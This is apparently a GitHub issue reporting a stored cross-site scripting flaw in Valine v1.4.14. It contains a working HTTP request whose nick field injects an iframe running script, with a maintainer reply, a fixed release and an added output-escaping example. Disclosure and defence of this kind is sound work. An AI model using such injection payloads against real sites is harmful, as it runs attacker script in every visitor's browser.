Nick
If you want to report a bug, please provide the following information:
Description
It is possible to embed arbitrary HTML/JavaScript in the comment (using the nick field), thus resulting in stored XSS (cross site scripting).
The steps to reproduce.
POST /1.1/classes/Comment HTTP/1.1
Host: XXX.api.lncld.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
Content-Length: 640
Origin: https://xxx.yyy.zzz

{
  "comment": "Good! \n",
  "nick": "Alex\"</a><iframe width=1 height=1 srcdoc=\"<script>console.log('Stored XSS test passed');</script>\"",
  "mail": "",
  "link": "",
  "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0",
  "url": "/en/prepare/prepare/",
  "QQAvatar": "",
  "ip": "1.2.3.4",
  "insertedAt": { "__type": "Date", "iso": "2020-11-04T08:30:47.526Z" },
  "ACL": { "*": { "read": true } }
}
This malicious request adds a new comment. The HTML-encoded value of the srcdoc attribute in the request is:
<script>console.log('Stored XSS test passed');</script>
The injected JavaScript executes on the vulnerable web page for every visitor.
Which versions of Valine, and which browser / OS are affected by this issue?
Valine: v1.4.14
All systems and browsers
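As an added defensive illustration (not Valine's own code), the following JavaScript renders the nick value as text rather than markup, using the nick payload from this report as a constructed sample; the field names follow the request body above, and `escapeHtml`, `safeLink`, `renderNick` and `rendersInert` are names chosen here.

```javascript
// Added example, not part of Valine. Field names mirror the report's JSON body.
const ESCAPE_MAP = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Escape every character that can open a tag, terminate an attribute value,
// or start an entity. Apply to untrusted text before concatenating it into HTML.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ESCAPE_MAP[ch]);
}

// Accept only absolute http(s) URLs for the nick anchor; anything else
// (empty string, other schemes, unparseable input) falls back to plain text.
function safeLink(link) {
  try {
    const url = new URL(link);
    return url.protocol === "http:" || url.protocol === "https:" ? url.href : null;
  } catch {
    return null;
  }
}

// Build the nick markup. Every untrusted value is escaped at the point of
// insertion, including inside the href attribute value.
function renderNick(comment) {
  const nick = escapeHtml(comment.nick);
  const href = safeLink(comment.link);
  return href
    ? `<a class="vnick" href="${escapeHtml(href)}" rel="nofollow noopener">${nick}</a>`
    : `<span class="vnick">${nick}</span>`;
}

// Constructed sample using the nick value from this report (link left empty as in the request).
const reportedComment = {
  comment: "Good! \n",
  nick: 'Alex"</a><iframe width=1 height=1 srcdoc="<script>console.log(\'Stored XSS test passed\');</script>"',
  link: "",
};

// True when no raw tag or attribute delimiter survives inside the rendered nick text.
function rendersInert(comment) {
  const html = renderNick(comment);
  const inner = html.replace(/^<(a|span)[^>]*>/, "").replace(/<\/(a|span)>$/, "");
  return !/[<>"]/.test(inner);
}
```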
Received; this will be fixed in the next version. Thanks for the feedback~
@xCss, Hi! I would like to point out that the official Valine website https://valine.js.org is also vulnerable to this stored XSS attack
https://github.com/xCss/Valine/releases/tag/v1.4.15